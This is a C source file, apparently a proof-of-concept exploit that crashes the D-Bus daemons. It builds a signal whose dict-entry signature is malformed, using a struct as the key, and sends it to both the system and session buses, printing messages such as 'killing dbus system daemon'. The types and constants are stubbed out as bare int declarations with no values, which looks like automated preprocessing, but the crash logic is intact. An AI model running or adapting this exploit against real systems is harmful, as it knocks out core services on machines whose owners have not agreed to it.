
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int uint32_t ;
typedef int DBusMessageIter ;
typedef int DBusMessage ;
typedef int DBusConnection ;


 int DBUS_BUS_SESSION ;
 int DBUS_BUS_SYSTEM ;
 char DBUS_DICT_ENTRY_BEGIN_CHAR ;
 char DBUS_DICT_ENTRY_END_CHAR ;
 char DBUS_STRUCT_BEGIN_CHAR ;
 char DBUS_STRUCT_END_CHAR ;
 int DBUS_TYPE_ARRAY ;
 int DBUS_TYPE_DICT_ENTRY ;
 char DBUS_TYPE_INT32 ;
 int DBUS_TYPE_STRUCT ;
 int DEST ;
 int NAME ;
 int PATH ;
 int SIGNAL ;
 int * dbus_bus_get (int ,int *) ;
 int dbus_connection_flush (int *) ;
 int dbus_connection_send (int *,int *,int *) ;
 int dbus_connection_unref (int *) ;
 int dbus_message_iter_append_basic (int *,char,int*) ;
 int dbus_message_iter_close_container (int *,int *) ;
 int dbus_message_iter_init_append (int *,int *) ;
 int dbus_message_iter_open_container (int *,int ,char*,int *) ;
 int * dbus_message_new_signal (int ,int ,int ) ;
 int dbus_message_set_destination (int *,int ) ;
 int dbus_message_unref (int *) ;
 int printf (char*) ;

int
main(int argc, char *argv[])
{
 char sig[8];
 uint32_t val = 0xdeadbeef;
 DBusMessage *message;
 DBusConnection *system, *session;
 DBusMessageIter iter1, iter2, iter3, iter4;

 printf("[+] creating malicious dbus message...\n");

 message = dbus_message_new_signal(PATH, NAME, SIGNAL);
 if (!message) {
  printf("[-] error: could not create dbus message\n");
  return 1;
 }
 if (!dbus_message_set_destination(message, DEST)) {
  printf("[-] error: could not create set dbus destination\n");
  return 1;
 }

 sig[0] = DBUS_DICT_ENTRY_BEGIN_CHAR;
 sig[1] = DBUS_STRUCT_BEGIN_CHAR;
 sig[2] = DBUS_TYPE_INT32;
 sig[3] = DBUS_TYPE_INT32;
 sig[4] = DBUS_STRUCT_END_CHAR;
 sig[5] = DBUS_TYPE_INT32;
 sig[6] = DBUS_DICT_ENTRY_END_CHAR;
 sig[7] = '\0';

 dbus_message_iter_init_append(message, &iter1);
 dbus_message_iter_open_container(&iter1, DBUS_TYPE_ARRAY, sig, &iter2);
 dbus_message_iter_open_container(&iter2, DBUS_TYPE_DICT_ENTRY, ((void*)0), &iter3);
 dbus_message_iter_open_container(&iter3, DBUS_TYPE_STRUCT, ((void*)0), &iter4);
 dbus_message_iter_append_basic(&iter4, DBUS_TYPE_INT32, &val);
 dbus_message_iter_append_basic(&iter4, DBUS_TYPE_INT32, &val);
 dbus_message_iter_close_container(&iter3, &iter4);
 dbus_message_iter_append_basic(&iter3, DBUS_TYPE_INT32, &val);
 dbus_message_iter_close_container(&iter2, &iter3);
 dbus_message_iter_close_container(&iter1, &iter2);

 printf("[+] connecting to dbus system daemon...\n");

 system = dbus_bus_get(DBUS_BUS_SYSTEM, ((void*)0));

 if (system) {
  printf("[+] killing dbus system daemon...\n");

  dbus_connection_send(system, message, ((void*)0));
  dbus_connection_flush(system);
  dbus_connection_unref(system);
 } else {
  printf("[-] error: could not connect to dbus system daemon\n");
 }

 printf("[+] connecting to dbus session daemon...\n");

 session = dbus_bus_get(DBUS_BUS_SESSION, ((void*)0));

 if (session) {
  printf("[+] killing dbus session daemon...\n");

  dbus_connection_send(session, message, ((void*)0));
  dbus_connection_flush(session);
  dbus_connection_unref(session);
 } else {
  printf("[-] error: could not connect to dbus session daemon\n");
 }

 dbus_message_unref(message);

 return 0;
}
